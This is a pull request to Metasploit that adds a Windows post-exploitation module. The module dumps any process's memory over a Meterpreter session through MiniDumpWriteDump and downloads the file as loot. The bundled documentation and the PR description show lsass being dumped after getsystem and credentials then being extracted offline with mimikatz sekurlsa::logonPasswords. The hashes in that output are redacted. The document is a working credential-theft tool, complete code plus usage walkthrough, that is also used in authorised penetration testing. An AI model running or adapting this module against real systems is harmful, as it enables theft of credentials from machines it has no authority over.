### PR TITLE
Process memory dump

### DIFF
--- a/documentation/modules/post/windows/gather/memory_dump.md
+++ b/documentation/modules/post/windows/gather/memory_dump.md
@@ -1,0 +1,119 @@
+## Vulnerable Application
+
+This module dumps the memory for any process on the system and retrieves it for later analysis.
+The user must have sufficient permissions to read the memory of that process. Low-privilege users
+should be able to read any of their own processes. High-privilege users should be able to read 
+any unprotected process.
+
+This module only works on a Meterpreter session on Windows.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  1. Get meterpreter session on a Windows host
+  1. Do: `use post/windows/gather/memory_dump`
+  1. Do: `set SESSION <session id>`
+  1. Do: `set PID <process id>`
+  1. Do: `set DUMP_PATH <path on remote system>`
+  1. Do: `set DUMP_TYPE <standard|full>`
+  1. Do: `run`
+  1. You should be able to see that the module has dumped the process to a file and starts downloading it.
+  1. You should be able to see, whether the module succeeds or fails, that the file on the remote system has been deleted.
+
+## Options
+
+### DUMP_PATH
+
+The path that the memory dump will be temporarily stored at. This file is then downloaded and deleted at the end of the run. This file should be in a writable location, and should not already exist.
+
+### PID
+
+The ID of the process to dump. To find the PID, in your Meterpreter session, type `ps`. To find a process by name, type `ps | <process name>`.
+
+### DUMP_TYPE
+
+Two options are provided for creating a memory dump:
+
+- Full
+
+This option retrieves the entire memory address space, including all DLLs, EXEs and memory mapped files. For dumping LSASS for offline analysis, this option seems to be preferable. However, the file size can be significantly larger than the Standard option.
+
+- Standard
+
+This option retrieves most data from the process, with the exception of DLLs, EXEs and memory mapped files. As a result, some analysis tools may have trouble with automated analysis, however any sensitive information such as passwords which are stored in memory should be part of this dump. This data could possibly be retrieved using a tool such as `strings`. The file size should be significantly smaller than the Full option.
+
+## Scenarios
+
+**Dumping lsass**
+
+Retrieving lsass (after getsystem)
+
+```
+meterpreter > ps | lsass
+Filtering on 'lsass'
+
+Process List
+============
+
+ PID  PPID  Name       Arch  Session  User                 Path
+ ---  ----  ----       ----  -------  ----                 ----
+ 700  536   lsass.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
+
+meterpreter > 
+Background session 4? [y/N]  
+msf6 post(windows/gather/memory_dump) > set pid 700
+pid => 700
+msf6 post(windows/gather/memory_dump) > run
+
+[*] Running module against DemoPC
+[*] Dumping memory for lsass.exe
+[*] Downloading minidump (5.31 MiB)
+[+] Memory dump stored at /home/user/.msf4/loot/20210505174955_default_192.168.XXX.XXX_windows.process._647943.bin
+[*] Deleting minidump from disk
+[*] Post module execution completed
+```
+
+Then in mimikatz (offline):
+
+```
+  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
+ .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
+ ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
+ ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
+ '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
+  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
+
+mimikatz # sekurlsa::minidump c:\Users\user\desktop\20210505175519_default_192.168.XXX.XXX_windows.process._162777.bin
+Switch to MINIDUMP : 'c:\Users\user\desktop\20210505175519_default_192.168.XXX.XXX_windows.process._162777.bin'
+
+mimikatz # sekurlsa::logonPasswords
+Opening : 'c:\Users\user\desktop\20210505175519_default_192.168.XXX.XXX_windows.process._162777.bin' file for minidump...
+
+Authentication Id : 0 ; 280858 (00000000:0004491a)
+Session           : RemoteInteractive from 2
+User Name         : user
+Domain            : DemoPC
+Logon Server      : DemoPC
+Logon Time        : 5/05/2021 3:15:10 PM
+SID               : S-1-5-21-920577323-754201681-977916534-1001
+        msv :
+         [00000003] Primary
+         * Username : user
+         * Domain   : DemoPC
+         * NTLM     : (redacted, but verified)
+         * SHA1     : (redacted)
+        tspkg :
+        wdigest :
+         * Username : user
+         * Domain   : DemoPC
+         * Password : (null)
+        kerberos :
+         * Username : user
+         * Domain   : DemoPC
+         * Password : (null)
+        ssp :
+        credman :
+        cloudap :
+```
+
+

--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/windows/def_dbghelp.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/windows/def_dbghelp.rb
@@ -1,0 +1,30 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Stdapi
+module Railgun
+module Def
+
+class Def_windows_dbghelp
+
+  def self.create_library(constant_manager, library_path = 'dbghelp')
+    dll = Library.new(library_path, constant_manager)
+
+    dll.add_function('MiniDumpWriteDump', 'BOOL',[
+      ["DWORD","hProcess","in"],
+      ["DWORD","ProcessId","in"],
+      ["DWORD","hFile","in"],
+      ["DWORD","DumpType","in"],
+      ["PBLOB","ExceptionParam","in"],
+      ["PBLOB","UserStreamParam","in"],
+      ["PBLOB","CallbackParam","in"],
+      ])
+
+    return dll
+  end
+
+end
+
+end; end; end; end; end; end; end

--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/windows/def_dbghelp.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/windows/def_dbghelp.rb
@@ -13,9 +13,9 @@ class Def_windows_dbghelp
     dll = Library.new(library_path, constant_manager)
 
     dll.add_function('MiniDumpWriteDump', 'BOOL',[
-      ["DWORD","hProcess","in"],
+      ["HANDLE","hProcess","in"],
       ["DWORD","ProcessId","in"],
-      ["DWORD","hFile","in"],
+      ["HANDLE","hFile","in"],
       ["DWORD","DumpType","in"],
       ["PBLOB","ExceptionParam","in"],
       ["PBLOB","UserStreamParam","in"],

--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
@@ -90,7 +90,8 @@ class Railgun
       'wlanapi',
       'wldap32',
       'version',
-      'psapi'
+      'psapi',
+      'dbghelp'
     ].freeze
   }.freeze
 

--- a/modules/post/windows/gather/memory_dump.rb
+++ b/modules/post/windows/gather/memory_dump.rb
@@ -131,7 +131,7 @@ class MetasploitModule < Msf::Post
 
     print_status("Running module against #{sysinfo['Computer']}")
 
-    pid = datastore['PID']
+    pid = datastore['PID'].to_i
 
     if pid == (session.sys.process.getpid) && !datastore['ForceExploit']
       fail_with(Msf::Module::Failure::BadConfig, 'Dumping current process is not recommended (can result in deadlock). To run anyway, set ForceExploit to True')

--- a/modules/post/windows/gather/memory_dump.rb
+++ b/modules/post/windows/gather/memory_dump.rb
@@ -1,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'tempfile'
+
+class MetasploitModule < Msf::Post
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Process Memory Dump',
+        'Description' => %q{
+          This module creates a memory dump of a process (to disk) and downloads the file
+          for offline analysis.
+          Options for DUMP_TYPE affect the completeness of the dump. "full" retrieves
+          the entire process address space (all allocated pages).
+          "standard" excludes image files (e.g. DLLs and EXEs in the address space) as
+          well as memory mapped files. As a result, this option can be significantly
+          smaller in size.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['smashery'],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter' ]
+      )
+    )
+    register_options([
+      OptString.new('PID', [true, 'ID of the process to dump memory from', nil, /\d+/]),
+      OptString.new('DUMP_PATH', [true, 'File to write memory dump to', nil]),
+      OptEnum.new('DUMP_TYPE', [ true, 'Minidump size', nil, ['standard', 'full']])
+    ])
+  end
+
+  def get_process_handle
+    target_pid = datastore['PID'].to_i
+    result = session.railgun.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, false, target_pid)
+    error = result['GetLastError']
+    unless error == 0
+      fail_with(Msf::Module::Failure::PayloadFailed, "Unable to open process: #{result['ErrorMessage']}")
+    end
+    result['return']
+  end
+
+  def create_file
+    path = datastore['DUMP_PATH']
+    result = session.railgun.kernel32.CreateFileW(
+      path,
+      'GENERIC_READ | GENERIC_WRITE',
+      0,
+      nil,
+      'CREATE_ALWAYS',
+      0,
+      0
+    )
+    error = result['GetLastError']
+    unless error == 0
+      fail_with(Msf::Module::Failure::PayloadFailed, "Unable to create file: #{result['ErrorMessage']}")
+    end
+    result['return']
+  end
+
+  def dump_process
+    target_pid = datastore['PID'].to_i
+    name = nil
+    client.sys.process.processes.each do |p|
+      if p['pid'] == target_pid
+        name = p['name']
+      end
+    end
+    fail_with(Msf::Module::Failure::PayloadFailed, "Could not find process #{target_pid}") unless name
+    print_status("Dumping memory for #{name}")
+
+    railgun = session.railgun
+
+    if datastore['DUMP_TYPE'] == 'standard'
+      # MiniDumpWithDataSegs | MiniDumpWithHandleData | MiniDumpWithIndirectlyReferencedMemory
+      # | MiniDumpWithProcessThreadData | MiniDumpWithPrivateReadWriteMemory | MiniDumpWithThreadInfo
+      dump_flags = 0x1 | 0x4 | 0x40 | 0x100 | 0x200 | 0x1000
+    elsif datastore['DUMP_TYPE'] == 'full'
+      # MiniDumpWithFullMemory
+      dump_flags = 0x2
+    end
+
+    process_handle = nil
+    file_handle = nil
+    begin
+      process_handle = get_process_handle
+      file_handle = create_file
+      result = railgun.dbghelp.MiniDumpWriteDump(process_handle,
+                                                 target_pid,
+                                                 file_handle,
+                                                 dump_flags,
+                                                 nil,
+                                                 nil,
+                                                 nil)
+      unless result['return']
+        fail_with(Msf::Module::Failure::PayloadFailed, "Minidump failed: #{result['ErrorMessage']}")
+      end
+    ensure
+      railgun.kernel32.CloseHandle(process_handle) if process_handle
+      railgun.kernel32.CloseHandle(file_handle) if file_handle
+    end
+
+    path = datastore['DUMP_PATH']
+
+    begin
+      meterp_temp = Tempfile.new('meterp')
+      meterp_temp.binmode
+      temp_path = meterp_temp.path
+      src_stat = client.fs.filestat.new(path)
+      print_status("Downloading minidump (#{Filesize.new(src_stat.size).pretty})")
+      session.fs.file.download_file(temp_path, path)
+      dump_contents = File.read(temp_path, mode: 'rb')
+      loot_path = store_loot('windows.process.dump', 'application/octet-stream', session, dump_contents)
+      print_good("Memory dump stored at #{loot_path}")
+      ::File.delete(temp_path)
+    ensure
+      print_status('Deleting minidump from disk')
+      session.fs.file.delete(path)
+    end
+  end
+
+  def run
+    if session.type != 'meterpreter'
+      print_error 'Only meterpreter sessions are supported by this post module'
+      return
+    end
+
+    print_status("Running module against #{sysinfo['Computer']}")
+
+    pid = datastore['PID']
+
+    if pid == (session.sys.process.getpid) && !datastore['ForceExploit']
+      fail_with(Msf::Module::Failure::BadConfig, 'Dumping current process is not recommended (can result in deadlock). To run anyway, set ForceExploit to True')
+    end
+
+    dump_process
+  end
+end


### PR DESCRIPTION
## Vulnerable Application

This module dumps the memory for any process on the system and retrieves it for later analysis. The user must have sufficient permissions to read the memory of that process. Low-privilege users should be able to read any of their own processes. High-privilege users should be able to read any unprotected process.

This module only works on a Meterpreter session on Windows.

## Verification Steps

  1. Start `msfconsole`
  1. Get meterpreter session on a Windows host
  1. Do: `use post/windows/gather/memory_dump`
  1. Do: `set SESSION <session id>`
  1. Do: `set PID <process id>`
  1. Do: `set DUMP_PATH <path on remote system>`
  1. Do: `set DUMP_TYPE <standard|full>`
  1. Do: `run`
  1. You should be able to see that the module has dumped the process to a file and starts downloading it.
  1. You should be able to see, whether the module succeeds or fails, that the file on the remote system has been deleted.

## Demo

Retrieving a notepad executable using a Standard dump:

```
meterpreter > ps | notepad
Filtering on 'notepad'

Process List
============

 PID   PPID  Name         Arch  Session  User              Path
 ---   ----  ----         ----  -------  ----              ----
 7840  5140  notepad.exe  x64   2        DemoPC\user       C:\Windows\System32\notepad.exe

meterpreter > 
Background session 4? [y/N]  
msf6 post(windows/gather/memory_dump) > set PID 7840
PID => 7840

[*] Running module against DemoPC
[*] Dumping memory for notepad.exe
[*] Downloading minidump (1.31 MiB)
[+] Memory dump stored at /home/user/.msf4/loot/20210505174712_default_192.168.XXX.XXX_windows.process._768442.bin
[*] Deleting minidump from disk
[*] Post module execution completed
```

Then in bash:

```
$ strings -e b /home/user/.msf4/loot/20210505174712_default_192.168.XXX.XXX_windows.process._768442.bin | grep metasploit
his is some text I have just typed into notepad for a metasploit demo
```

Retrieving lsass using a Full dump (after getsystem, which is definitely broken as far as I can tell; someone should get on to @OJ about that):

```
meterpreter > ps | lsass
Filtering on 'lsass'

Process List
============

 PID  PPID  Name       Arch  Session  User                 Path
 ---  ----  ----       ----  -------  ----                 ----
 700  536   lsass.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe

meterpreter > 
Background session 4? [y/N]  
msf6 post(windows/gather/memory_dump) > set pid 700
pid => 700
msf6 post(windows/gather/memory_dump) > run

[*] Running module against DemoPC
[*] Dumping memory for lsass.exe
[*] Downloading minidump (5.31 MiB)
[+] Memory dump stored at /home/user/.msf4/loot/20210505174955_default_192.168.XXX.XXX_windows.process._647943.bin
[*] Deleting minidump from disk
[*] Post module execution completed
```

Then in mimikatz:

```
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # sekurlsa::minidump c:\Users\user\desktop\20210505175519_default_192.168.XXX.XXX_windows.process._162777.bin
Switch to MINIDUMP : 'c:\Users\user\desktop\20210505175519_default_192.168.XXX.XXX_windows.process._162777.bin'

mimikatz # sekurlsa::logonPasswords
Opening : 'c:\Users\user\desktop\20210505175519_default_192.168.XXX.XXX_windows.process._162777.bin' file for minidump...

Authentication Id : 0 ; 280858 (00000000:0004491a)
Session           : RemoteInteractive from 2
User Name         : user
Domain            : DemoPC
Logon Server      : DemoPC
Logon Time        : 5/05/2021 3:15:10 PM
SID               : S-1-5-21-920577323-754201681-977916534-1001
        msv :
         [00000003] Primary
         * Username : user
         * Domain   : DemoPC
         * NTLM     : (redacted, but verified)
         * SHA1     : (redacted)
        tspkg :
        wdigest :
         * Username : user
         * Domain   : DemoPC
         * Password : (null)
        kerberos :
         * Username : user
         * Domain   : DemoPC
         * Password : (null)
        ssp :
        credman :
        cloudap :

    ...
```